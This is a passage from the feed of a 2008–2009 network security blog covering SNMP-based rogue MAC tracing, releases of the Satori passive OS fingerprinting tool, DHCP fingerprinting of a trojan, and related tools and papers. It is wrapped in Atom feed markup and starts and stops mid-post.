I'm not saying someone won't come up with something new, because I'm sure they will, I'm just curious when it will happen and how they'll come up with it.&lt;br /&gt;&lt;br /&gt;While I'm waiting though, I decided to revisit SNMP capabilities.  I still get emails from time to time about the objects_id.txt file that I originally compiled and then updated for Languard Network Security scanner back in 2001.  (Or did Bogdan come up with it and I just updated it, sad how quickly the memory goes!)&lt;br /&gt;&lt;br /&gt;Anyway, recently our network engineer and I were trying to track down some rogue MACs that were infected with DHCPChanger and another box that had Microsoft's Internet Connection Sharing turned on (what a pain that is in a large environment!)  There are things that can be done, such as DHCP Snooping on the switch, etc, and that is mostly in place now, but this whole issue got me thinking of how we could do this quicker and easier.  Jumping on switch after switch, dumping the MAC table, determining what port it was coming down, remoting into that switch and doing the whole process over again seemed like a waste of time.&lt;br /&gt;&lt;br /&gt;Enter SNMP.  I had looked at this idea back in 2001, but articles like this, from the vendor, weren't readily available.  Cisco published &lt;a href="http://www.cisco.com/en/US/tech/tk648/tk362/technologies_tech_note09186a00801c9199.shtml"&gt;this&lt;/a&gt; one which helped a lot on trying to figure this out.&lt;br /&gt;&lt;br /&gt;Anyway, the idea is simple enough, and I'm sure there are other products out there to do it, but you give it the MAC you are looking for, the IP to start with (probably a nice Layer 3 device at the "center" of your infrastructure) and the public community name and you hit go.  
Depending on the number of VLANs you have to enumerate, you are looking at 20-30 seconds per device to determine all the ports, neighbors connected via those ports, ip address and desc of those neighbors and all MACs associated with each of the ports.  Assuming there is another switch down Port X, snmp walk that device next, rinse and repeat until you get to the end port where that MAC resides.  A lot nicer than bouncing through 3-7 devices trying to find something!&lt;br /&gt;&lt;br /&gt;Taking that of course to the next level is to build a tree of all devices, pulling their object ids, system descriptions, etc.  Start at device 1, anywhere in the infrastructure, query it, ask it about its neighbors, query each of them in turn, walking round and round until you've mapped it all out.  &lt;br /&gt;&lt;br /&gt;Tracking the MAC back to a specific port is pretty much done, nothing pretty, but it works.  Building the map is all in my head, but the ground work is laid out in what I've already accomplished, so now I just need some free time to code!  Only thing still to figure out is what happens, or how to detect, redundant links.  Don't want to start a loop, walking down the port I just came from, or if multiple paths exist, wandering back down to devices I've already scanned.  All doable, just have to sit down and think about it.&lt;br /&gt;&lt;br /&gt;Again, nothing ground breaking here, just finally getting back to a project we talked about in the 2001-2002 era, but didn't have enough info on how vendors were storing info via SNMP.  
Oh, and for initial release, if that ever does happen, it will probably only work on Cisco devices, since that is all I have to play with.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5343200444918965958-7698135810020143187?l=chatteronthewire.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://chatteronthewire.blogspot.com/feeds/7698135810020143187/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=5343200444918965958&amp;postID=7698135810020143187' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5343200444918965958/posts/default/7698135810020143187'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5343200444918965958/posts/default/7698135810020143187'/><link rel='alternate' type='text/html' href='http://chatteronthewire.blogspot.com/2009/04/forgotten-power-of-snmp.html' title='The forgotten power of SNMP'/><author><name>xnih</name><uri>http://www.blogger.com/profile/13163054542096571716</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5343200444918965958.post-708524191114354422</id><published>2009-04-07T20:36:00.001-06:00</published><updated>2009-04-07T20:37:29.972-06:00</updated><title type='text'>Satori - Linux Version Part 2</title><content type='html'>Ok, officially have links on my website for the linux version of Satori.  
Made some bug fixes from the initial release to get around 256 char strings in fpc that I had forgotten about.&lt;br /&gt;&lt;br /&gt;Added a few more command line options, updated the dhcp.xml file, etc.&lt;br /&gt;&lt;br /&gt;Version 0.1.1 is now out there for anyone that is interested.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5343200444918965958-708524191114354422?l=chatteronthewire.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://chatteronthewire.blogspot.com/feeds/708524191114354422/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=5343200444918965958&amp;postID=708524191114354422' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5343200444918965958/posts/default/708524191114354422'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5343200444918965958/posts/default/708524191114354422'/><link rel='alternate' type='text/html' href='http://chatteronthewire.blogspot.com/2009/04/satori-linux-version-part-2.html' title='Satori - Linux Version Part 2'/><author><name>xnih</name><uri>http://www.blogger.com/profile/13163054542096571716</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5343200444918965958.post-4252892265168116066</id><published>2009-03-22T16:30:00.002-06:00</published><updated>2009-03-22T16:35:11.293-06:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='fpc'/><category scheme='http://www.blogger.com/atom/ns#' term='linux'/><category scheme='http://www.blogger.com/atom/ns#' term='satori'/><title type='text'>Satori, Linux version</title><content 
type='html'>Ok, been busy working on a command line version of Satori for Linux.  There is certain functionality in the windows version that I will not try to replicate in the cmd line version.  Since I'm just doing output to screen, an overall score and some of the other things, such as ICMP sequence differences, will not be there.&lt;br /&gt;&lt;br /&gt;So far I've ported the DHCP, TCP, p0f and ettercap stuff over.&lt;br /&gt;&lt;br /&gt;It is written in free pascal (fpc) with the lazarus IDE.  Ultimately my goal is to get as much of it over to Linux as possible and most likely to rewrite the whole thing in fpc so that I can have a GUI version on both windows and linux.&lt;br /&gt;&lt;br /&gt;Main reason I'm writing it for Linux is so I can play with it on the wall-warts I wrote about a few weeks ago.  Assuming I have some extra cash I'll probably be ordering one in the near future.  This will require me to compile it for ARM also, hopefully all goes well!&lt;br /&gt;&lt;br /&gt;If anyone wants a copy, let me know.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5343200444918965958-4252892265168116066?l=chatteronthewire.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://chatteronthewire.blogspot.com/feeds/4252892265168116066/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=5343200444918965958&amp;postID=4252892265168116066' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5343200444918965958/posts/default/4252892265168116066'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5343200444918965958/posts/default/4252892265168116066'/><link rel='alternate' type='text/html' href='http://chatteronthewire.blogspot.com/2009/03/satori-linux-version.html' title='Satori, Linux 
version'/><author><name>xnih</name><uri>http://www.blogger.com/profile/13163054542096571716</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5343200444918965958.post-429556069926320608</id><published>2009-03-17T10:59:00.004-06:00</published><updated>2009-03-17T11:02:43.597-06:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='trojan'/><category scheme='http://www.blogger.com/atom/ns#' term='fingerprint'/><category scheme='http://www.blogger.com/atom/ns#' term='dhcp'/><title type='text'>Trojan.Flush.M and DHCP</title><content type='html'>&lt;a href="http://www.symantec.com/security_response/writeup.jsp?docid=2008-120318-5914-99"&gt;Symantec&lt;/a&gt; has a nice writeup on this, it is a few months old, but a new variant appears to be running around now.&lt;br /&gt;&lt;br /&gt;Now from an identification perspective, DHCP fingerprinting comes in quite nicely here!  I was able to get someone to send me a packet capture of DHCP Offers and ACKs from an infected machine on the latest variant.  I'd like to get a few others also, but have not had a chance to look into it much due to other projects and work.&lt;br /&gt;&lt;br /&gt;I'll be adding the fingerprint into the dhcp.xml file here shortly, assuming time permits.  
If anyone has packet captures from other variants of this trojan, or others that are doing dhcp offers/acks, please email them to me.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5343200444918965958-429556069926320608?l=chatteronthewire.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://chatteronthewire.blogspot.com/feeds/429556069926320608/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=5343200444918965958&amp;postID=429556069926320608' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5343200444918965958/posts/default/429556069926320608'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5343200444918965958/posts/default/429556069926320608'/><link rel='alternate' type='text/html' href='http://chatteronthewire.blogspot.com/2009/03/trojanflushm-and-dhcp.html' title='Trojan.Flush.M and DHCP'/><author><name>xnih</name><uri>http://www.blogger.com/profile/13163054542096571716</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5343200444918965958.post-3365875108886106230</id><published>2009-02-25T11:52:00.003-07:00</published><updated>2009-02-25T11:58:22.055-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='wall-wart'/><category scheme='http://www.blogger.com/atom/ns#' term='pentesting'/><title type='text'>Cool little device</title><content type='html'>Ok, nothing to do with OS Fingerprinting, but since I've been looking into Pentesting so much lately also, when I saw this post earlier today on Twitter by Hal, all I could think of was how much fun one could have with one 
of these!&lt;br /&gt;&lt;br /&gt;http://www.linuxdevices.com/news/NS9634061300.html?kc=rss&lt;br /&gt;&lt;br /&gt;These devices are getting smaller and smaller all the time and cheaper and cheaper.&lt;br /&gt;&lt;br /&gt;I'm waiting to see one with two ethernet ports on it, basically an internal switch so that you can drop one of these behind someone's desk, plug their computer feed into your device, a short cable from the device to their computer and then have this thing phone home and open some type of door for you.  &lt;br /&gt;&lt;br /&gt;As it is now that could still be done easily enough with it, but you also have to find a network port that is live.  Adding the internal switch would just make things easier.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5343200444918965958-3365875108886106230?l=chatteronthewire.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://chatteronthewire.blogspot.com/feeds/3365875108886106230/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=5343200444918965958&amp;postID=3365875108886106230' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5343200444918965958/posts/default/3365875108886106230'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5343200444918965958/posts/default/3365875108886106230'/><link rel='alternate' type='text/html' href='http://chatteronthewire.blogspot.com/2009/02/cool-little-device.html' title='Cool little device'/><author><name>xnih</name><uri>http://www.blogger.com/profile/13163054542096571716</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' 
src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5343200444918965958.post-625411643020328549</id><published>2009-02-24T10:20:00.003-07:00</published><updated>2009-02-24T10:35:06.081-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='insecure magazine'/><category scheme='http://www.blogger.com/atom/ns#' term='os fingerprinting'/><category scheme='http://www.blogger.com/atom/ns#' term='xprobe2'/><title type='text'>Insecure Magazine, os fingerprinting and xprobe2</title><content type='html'>The latest version of &lt;a href="http://www.net-security.org/dl/insecure/INSECURE-Mag-20.pdf"&gt;(in)secure&lt;/a&gt; was released here recently.  The first article this month was on using a new version of xprobe2 to do fingerprinting.  Sounds like some new features have been added and some cleanup has been done.  &lt;br /&gt;&lt;br /&gt;Looks like the next release is due out in June of &lt;a href="http://xprobe.sourceforge.net"&gt;xprobe&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5343200444918965958-625411643020328549?l=chatteronthewire.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://chatteronthewire.blogspot.com/feeds/625411643020328549/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=5343200444918965958&amp;postID=625411643020328549' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5343200444918965958/posts/default/625411643020328549'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5343200444918965958/posts/default/625411643020328549'/><link rel='alternate' type='text/html' href='http://chatteronthewire.blogspot.com/2009/02/insecure-magazine-os-fingerprinting-and.html' 
title='Insecure Magazine, os fingerprinting and xprobe2'/><author><name>xnih</name><uri>http://www.blogger.com/profile/13163054542096571716</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5343200444918965958.post-8650453326360301129</id><published>2009-02-22T19:22:00.003-07:00</published><updated>2009-02-22T19:29:20.231-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='EFFormat'/><category scheme='http://www.blogger.com/atom/ns#' term='EDHCPfingerprint'/><title type='text'>EDHCPFingerprint &amp; EFFormat</title><content type='html'>Both programs from enterasys have been updated again!  They've been busy.  Main change I know about is a repository.xml file that is generated.  It looks to see what names show up across multiple .xml files (tcp, mac, dhcp, smb, etc).  It was a very useful feature in cleaning up some of my files.  
Some of which I'm not even using yet, but that I've been adding to from time to time in the past and hope to use in the future!&lt;br /&gt;&lt;br /&gt;I've pretty much started using EFFormat full time now in editing my fingerprint files!&lt;br /&gt;&lt;br /&gt;As always, they can be found here at &lt;a href="http://secure.enterasys.com/support/tools.html"&gt;enterasys&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5343200444918965958-8650453326360301129?l=chatteronthewire.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://chatteronthewire.blogspot.com/feeds/8650453326360301129/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=5343200444918965958&amp;postID=8650453326360301129' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5343200444918965958/posts/default/8650453326360301129'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5343200444918965958/posts/default/8650453326360301129'/><link rel='alternate' type='text/html' href='http://chatteronthewire.blogspot.com/2009/02/edhcpfingerprint-efformat.html' title='EDHCPFingerprint &amp; EFFormat'/><author><name>xnih</name><uri>http://www.blogger.com/profile/13163054542096571716</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5343200444918965958.post-5115504474361199997</id><published>2009-02-22T19:17:00.002-07:00</published><updated>2009-02-22T19:22:49.859-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='packetfence'/><category scheme='http://www.blogger.com/atom/ns#' term='satori'/><title type='text'>Updated 
Software</title><content type='html'>Satori updated to version 0.62.  Lots of new fingerprints added and others updated.  Took things like Linux distros and combined them where it made sense instead of having 5 fingerprints that were all the same because they were based on the same distro.  Also added the packetfence fingerprint info back into my dhcp.xml file.  We'll see if the packetfence project starts using the .xml file or not, it has been discussed in the past and may be being looked at again.  We'll see.  &lt;br /&gt;&lt;br /&gt;With the addition of these fingerprints back into dhcp.xml I decided to give the user a few more options in parsing dhcp fingerprints.  You'll find it under options.  I also added a new option for arp parsing, since it was in an 'addon' dll before.  Now it is just an option.&lt;br /&gt;&lt;br /&gt;Last major change was an update program.  It is a stand alone program that will update the .exe, .dll, and .xml files.  It is nothing fancy, but it gets the job done.  
It will let you keep up to date on the latest fingerprint files, dll's, etc without me having to do a full new .zip file!&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5343200444918965958-5115504474361199997?l=chatteronthewire.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://chatteronthewire.blogspot.com/feeds/5115504474361199997/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=5343200444918965958&amp;postID=5115504474361199997' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5343200444918965958/posts/default/5115504474361199997'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5343200444918965958/posts/default/5115504474361199997'/><link rel='alternate' type='text/html' href='http://chatteronthewire.blogspot.com/2009/02/updated-software.html' title='Updated Software'/><author><name>xnih</name><uri>http://www.blogger.com/profile/13163054542096571716</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5343200444918965958.post-5945467295741637638</id><published>2009-01-10T08:05:00.005-07:00</published><updated>2009-01-10T08:15:12.645-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='fingerprinting'/><category scheme='http://www.blogger.com/atom/ns#' term='EFFormat'/><category scheme='http://www.blogger.com/atom/ns#' term='enterasys'/><category scheme='http://www.blogger.com/atom/ns#' term='EDHCPfingerprint'/><title type='text'>EDHCPFingerprint &amp; EFFormat</title><content type='html'>As mentioned previously we've been busy recently on the fingerprint files.  
Jeff of enterasys has been quite busy on 2 programs this past month.&lt;br /&gt;&lt;br /&gt;EDHCPFingerprint - reads in the dhcp.xml file and an exported tcpdump file of bootp packets in text format and will determine the OS based on that.  It also has some other cool export features.&lt;br /&gt;&lt;br /&gt;EFFormat - reads in all the .xml files that I have built for satori (some that I'm not even using yet) and allows you to modify them.  I have a built in version in Satori that sorta did this, but nothing as nice!&lt;br /&gt;&lt;br /&gt;Both programs can be found at &lt;a href="http://secure.enterasys.com/support/tools.html"&gt;Enterasys Tools page&lt;/a&gt;.&lt;br /&gt;&lt;br /&gt;Due to all the recent work on these files we of course found and cleaned up a lot of old fingerprints that were inaccurate or did not provide enough info anymore.  There have also been a few new fingerprints added.  So the fingerprinting based on DHCP should be more accurate.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5343200444918965958-5945467295741637638?l=chatteronthewire.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='related' href='http://secure.enterasys.com/support/tools.html' title='EDHCPFingerprint &amp; EFFormat'/><link rel='replies' type='application/atom+xml' href='http://chatteronthewire.blogspot.com/feeds/5945467295741637638/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=5343200444918965958&amp;postID=5945467295741637638' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5343200444918965958/posts/default/5945467295741637638'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5343200444918965958/posts/default/5945467295741637638'/><link rel='alternate' type='text/html' 
href='http://chatteronthewire.blogspot.com/2009/01/edhcpfingerprint-efformat.html' title='EDHCPFingerprint &amp; EFFormat'/><author><name>xnih</name><uri>http://www.blogger.com/profile/13163054542096571716</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5343200444918965958.post-3178456248175536984</id><published>2008-12-24T08:44:00.003-07:00</published><updated>2009-01-10T08:14:56.983-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='dhcp.xml'/><category scheme='http://www.blogger.com/atom/ns#' term='enterasys'/><category scheme='http://www.blogger.com/atom/ns#' term='networkminer'/><category scheme='http://www.blogger.com/atom/ns#' term='EDHCPfingerprint'/><title type='text'>EDHCPFingerprint</title><content type='html'>Jeff from Enterasys has been working with me and Erik (author of NetworkMiner) on tweaks to the dhcp schema.  A lot of it was changes they wanted to see done to help extend it out.  I was just the middle man since I own the file!  :)&lt;br /&gt;&lt;br /&gt;These changes will come in quite useful, in different ways, to all of us and I'm glad they were made.  Hopefully we've finished for now with the latest change being done earlier this morning.&lt;br /&gt;&lt;br /&gt;In the near future, hopefully I'll start leveraging the new info included in it better.  
Just need time!&lt;br /&gt;&lt;br /&gt;Anyway, check out EDHCPFingerprint if you get a chance.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5343200444918965958-3178456248175536984?l=chatteronthewire.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='related' href='http://secure.enterasys.com/support/tools.html' title='EDHCPFingerprint'/><link rel='replies' type='application/atom+xml' href='http://chatteronthewire.blogspot.com/feeds/3178456248175536984/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=5343200444918965958&amp;postID=3178456248175536984' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5343200444918965958/posts/default/3178456248175536984'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5343200444918965958/posts/default/3178456248175536984'/><link rel='alternate' type='text/html' href='http://chatteronthewire.blogspot.com/2008/12/edhcpfingerprint.html' title='EDHCPFingerprint'/><author><name>xnih</name><uri>http://www.blogger.com/profile/13163054542096571716</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5343200444918965958.post-6067673239789276947</id><published>2008-12-17T21:04:00.004-07:00</published><updated>2008-12-17T21:13:29.325-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='networkminer'/><category scheme='http://www.blogger.com/atom/ns#' term='satori'/><category scheme='http://www.blogger.com/atom/ns#' term='dhcp'/><title type='text'>Updated Software</title><content type='html'>NetworkMiner - &lt;br /&gt;Ok, been spending a lot of time trying to crash NetworkMiner for the author.  
Found a nice little bug he had going and quite a few crashes.  All of those are fixed in 0.87 which was recently released.  If you are using NetworkMiner I highly recommend updating to the latest version to fix the nasty little bug earlier versions had on saving files.&lt;br /&gt;&lt;br /&gt;Satori - &lt;br /&gt;Also been spending a lot of time with Erik, author of NetworkMiner, and Jeff (from a private company) on updating the dhcp.xml file schema.  Jeff had a lot of good recommendations and has provided a few new fingerprints.  Between the 3 of us we updated the schema to a very good 1.0 version I think.  I may do an overhaul of it a year or two down the road to add some other functionality into it, but we'll see.  Anyway, the new version allows us to group Devices much nicer than before.  For Satori it will give me the ability to group Devices across fingerprinting files (dhcp, icmp, tcp) since all 3 have been updated to the new format.  Not sure when I'll add the functionality to utilize it, but it is updated along with the removal of a lot of old information in the dhcp.xml file that came from the packetfence.org project.  It was nice to have at one point, but since they do not track if it is a dhcp inform/discover/request packet, it doesn't do me any good anymore, so it was removed, along with some other fingerprints I got from files around the same time that did not have everything I needed!&lt;br /&gt;&lt;br /&gt;Always looking for new fingerprints.  
And on that note, I setup an account dhcpfingerprints [AT] gmail.com specifically for fingerprints, originally for dhcp ones (since that is how most people keep finding out about Satori), but will probably use it for all fingerprints.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5343200444918965958-6067673239789276947?l=chatteronthewire.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://chatteronthewire.blogspot.com/feeds/6067673239789276947/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=5343200444918965958&amp;postID=6067673239789276947' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5343200444918965958/posts/default/6067673239789276947'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5343200444918965958/posts/default/6067673239789276947'/><link rel='alternate' type='text/html' href='http://chatteronthewire.blogspot.com/2008/12/updated-software.html' title='Updated Software'/><author><name>xnih</name><uri>http://www.blogger.com/profile/13163054542096571716</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5343200444918965958.post-2546197444073879118</id><published>2008-11-15T09:24:00.004-07:00</published><updated>2008-11-15T10:02:46.714-07:00</updated><title type='text'>Twitter</title><content type='html'>Well finally decided to setup a twitter account.  Long story short, someone got a hold of me mentioning my DHCP paper, he was one of the original authors from KU on it and mentioned my paper was mentioned by yet someone else on twitter.  
Decided it was time to check it out.&lt;br /&gt;&lt;br /&gt;My &lt;a href="http://twitter.com/xnih"&gt;site&lt;/a&gt; probably will never see postings, but who knows.  I'm basically just using it to follow some other sites, which I could probably do via other means, but....&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5343200444918965958-2546197444073879118?l=chatteronthewire.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://chatteronthewire.blogspot.com/feeds/2546197444073879118/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=5343200444918965958&amp;postID=2546197444073879118' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5343200444918965958/posts/default/2546197444073879118'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5343200444918965958/posts/default/2546197444073879118'/><link rel='alternate' type='text/html' href='http://chatteronthewire.blogspot.com/2008/11/twitter.html' title='Twitter'/><author><name>xnih</name><uri>http://www.blogger.com/profile/13163054542096571716</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5343200444918965958.post-903435971611357132</id><published>2008-11-08T20:26:00.002-07:00</published><updated>2008-11-08T20:38:41.057-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='AP'/><category scheme='http://www.blogger.com/atom/ns#' term='802.11'/><title type='text'>Active AP 802.11 Fingerprinting</title><content type='html'>Toorcon recently seems to have had a presentation on Fingerprinting APs to see if they are ones you 
should trust. (Click on the Title to see it)&lt;br /&gt;&lt;br /&gt;Some interesting tests by tweaking flags sent and doing clock skew tests.  Looks like it may have also been presented at Blackhat and ShmooCon this year.&lt;br /&gt;&lt;br /&gt;The presentation material for Toorcon seems to be a little longer than the ShmooCon one, though ShmooCon's seems to have a few different slides in it.  Didn't go looking for it at Blackhat.&lt;br /&gt;&lt;br /&gt;Makes me think I should work on getting Satori to be able to use my AirPCap adapter and start working at breaking down those 802.11 packets!&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5343200444918965958-903435971611357132?l=chatteronthewire.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='related' href='http://toorcon.org/tcx/8_Bratus.pdf' title='Active AP 802.11 Fingerprinting'/><link rel='replies' type='application/atom+xml' href='http://chatteronthewire.blogspot.com/feeds/903435971611357132/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=5343200444918965958&amp;postID=903435971611357132' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5343200444918965958/posts/default/903435971611357132'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5343200444918965958/posts/default/903435971611357132'/><link rel='alternate' type='text/html' href='http://chatteronthewire.blogspot.com/2008/11/active-ap-80211-fingerprinting.html' title='Active AP 802.11 Fingerprinting'/><author><name>xnih</name><uri>http://www.blogger.com/profile/13163054542096571716</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' 
src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5343200444918965958.post-945484770423005021</id><published>2008-11-08T20:18:00.004-07:00</published><updated>2008-11-08T20:38:59.840-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Application Fingerprinting'/><title type='text'>Advanced application level OS fingerprinting</title><content type='html'>A short (36 pages or so) powerpoint type paper on Application Level Fingerprinting.&lt;br /&gt;&lt;br /&gt;I found it interesting how, depending on the OS the application was running on, it would act differently depending on what was sent at it.  After doing some of this for going on 10 years, I'm surprised to find that I'm surprised by it, but I was.&lt;br /&gt;&lt;br /&gt;Anyway, seems like a nice writeup on a new way of thinking/testing a few things.  If I was still big into Active Fingerprinting I may have had to try to expand on this, but for now, I have enough projects.&lt;br /&gt;&lt;br /&gt;Check it out.  And if you don't like pdf's, check out the original post at &lt;a href="http://www.securityfocus.com/archive/1/497908"&gt;SecurityFocus&lt;/a&gt; and grab one of the 